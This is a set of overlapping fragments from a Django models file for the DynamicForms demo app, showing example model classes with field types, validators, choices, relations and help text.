"class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256)",
"info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me,",
"serializer # and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation,",
"in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available only",
"MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\"",
"char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field')",
"= models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for",
"null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self):",
"Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide",
"additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter",
"'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this",
"AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field",
"on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field",
"= models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter something')",
"datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models",
"= models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields",
"only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field",
"models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def",
"= models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1)",
"8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This",
"models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True,",
"file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/',",
"\"\"\" Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item",
"email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field",
"forms in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available",
"file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute",
"max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True)",
"Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True,",
"= models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True,",
"validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True,",
"related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE,",
"characters, followed by up to 8 numbers') ]) enabled = models.BooleanField() amount =",
"default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20,",
"nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True)",
"field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name",
"data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity',",
"= models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field =",
"- timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" #",
"models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field =",
"'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field",
"MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model):",
"DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field =",
"DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8)",
"in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$',",
"= models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' )",
"help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional",
"models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter something') class",
"to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model):",
"class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter",
"help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have",
"in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True,",
"This one should be interesting: will a blank value pass the Min validator?",
"models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),",
"= models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations #",
")) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice",
"= models.? # Relations # string_related_field, which is always read_only is defined only",
"null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell",
"field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'),",
"always read_only is defined only in serializer # and primary_key_related_field is defined as",
"field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'),",
"Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name",
"please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of",
"django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10,",
"to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True,",
"how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field",
"point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here')",
"class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records in",
"(1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4,",
"need to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D',",
"(1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices',",
"Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string",
"= models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field",
"models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations # string_related_field,",
"models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True,",
"= models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting:",
"class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char",
"verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice",
"int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3,",
"= models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True)",
"= models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field",
"'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field",
"models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field",
"timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+',",
"models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a blank value",
"# dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField()",
"import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from",
"enter a string starting with two characters, followed by up to 8 numbers')",
"Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field',",
"\"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field",
"= models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field =",
"\"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a",
"= models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point / comma')",
"one should be interesting: will a blank value pass the Min validator? It",
"models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field",
"the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ...,",
"blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field =",
"2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms",
"('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight',",
"models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ),",
"Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description')",
"default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field =",
"up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[",
"followed by up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True,",
"multi-choice field so you will need to override it in form ('A', 'A'),",
"numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one",
"A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\"",
"Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self):",
"models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will",
"PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records in ViewSet",
"= models.? # model_field = models.? # Relations # string_related_field, which is always",
"note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=(",
"MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice",
"max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field",
"field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field',",
"from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code =",
"'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be",
"field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0,",
"a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional",
"will a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ])",
"models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name =",
"abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'),",
"decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info",
"blank=True, choices=( # this one will be a multi-choice field so you will",
"should be interesting: will a blank value pass the Min validator? It should!",
"models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=(",
"(None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True)",
"4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field',",
"and DictField not supported in HTML forms in DRF\"\"\" # list_field = models.?",
"field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\"",
"max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field =",
"float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field =",
"= models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field =",
"models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in",
"DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field =",
"= models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True,",
"have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles",
"in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice",
"unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst',",
"blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field =",
"(2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( #",
"related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class",
"# and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE,",
"blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you",
"models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model",
"blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free",
"uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True)",
"models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/',",
"3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\"",
"as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field =",
"= models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True)",
"= models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' )",
"# Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field",
"('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options",
"= models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name",
"\"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.?",
"related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return",
"= models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field",
"help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean",
"url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field",
"(2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with",
"null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation,",
"return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh",
"= models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True,",
"\"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced",
"this one will be a multi-choice field so you will need to override",
"hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'),",
"models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note =",
"PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.?",
"from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation",
"defined only in serializer # and primary_key_related_field is defined as its source primary_key_related_field",
"be a multi-choice field so you will need to override it in form",
"= models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note",
"field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2,",
"regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field =",
"\"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime",
"\"\"\" Shows how DynamicForms handles dynamic loading of many records in ViewSet result",
"= models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a blank",
"Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self):",
"= models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True,",
"= models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True,",
"interesting: will a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10)",
"time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\"",
"models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field =",
"'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C",
"= models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice",
"how DynamicForms handles dynamic loading of many records in ViewSet result \"\"\" description",
"@property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not",
"models.? # model_field = models.? # Relations # string_related_field, which is always read_only",
"models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field =",
"handles dynamic loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20,",
"ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'),",
"verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now",
"dynamic loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item",
"choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name",
"'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True)",
"models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True,",
"models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No",
"you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms",
"= models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field",
"MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0,",
"so you will need to override it in form ('A', 'A'), ('B', 'B'),",
"models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True)",
"name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available",
"password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\"",
"__str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\"",
"models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8)",
"def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles",
"shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic",
"choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True,",
"('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld",
"HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc",
"null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field =",
"\"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice",
"DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available only for",
"is defined only in serializer # and primary_key_related_field is defined as its source",
"3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field",
"= models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field",
"blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20,",
"null=True, blank=True, help_text='Now that you have shown me, please enter something') class PageLoad(models.Model):",
"only in serializer # and primary_key_related_field is defined as its source primary_key_related_field =",
"records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1,",
"verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice",
"= models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None,",
"null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field",
"It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type =",
"enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be",
"class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def",
"models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class",
"field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class",
"from datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import",
"= models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'),",
"= models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class",
"models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field =",
"'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags",
"help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')),",
"models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point / comma') cst_fld",
"verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer",
"loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description')",
"models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True,",
"models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by",
"RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows",
"(0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer",
"('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen',",
"('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ])",
"to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs',",
"4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a",
"= models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property",
"= models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed",
"Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' )",
"two characters, followed by up to 8 numbers') ]) enabled = models.BooleanField() amount",
"is always read_only is defined only in serializer # and primary_key_related_field is defined",
"free to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True,",
"return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field",
"= models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice",
"attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now()",
"blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field =",
"\"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return",
"HTML forms in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField",
